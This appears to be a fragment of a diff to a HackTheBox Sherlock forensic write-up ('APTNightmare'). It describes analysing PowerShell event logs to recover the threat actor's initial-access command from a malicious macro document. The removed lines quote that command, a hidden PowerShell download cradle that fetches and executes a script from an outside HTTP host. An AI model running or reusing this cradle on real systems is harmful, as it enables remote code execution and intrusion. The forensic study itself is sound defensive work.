jon-brandy/hackthebox/Categories/Sherlocks/APTNightmare/README.md

 89. However we still did not find the command used by the threat actor to gain initial access, based on the cyber kill chain, this command should refer to the malware installation command.
 Anyway after parsed and reviewing the `Windows Powershell` event log using `EvtxEcmd.exe` and `Timeline Explorer`, finally found the command used by the threat actor to gained initial acccess (command provided inside the `policy.docm` file).
-90. Great!
-Now we know the command used by the threat actor's for initial access is --> `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.5:806/a'))`

 > TIMELINE EXPLORER OF ANALYZING Windows Powershell EVENT LOG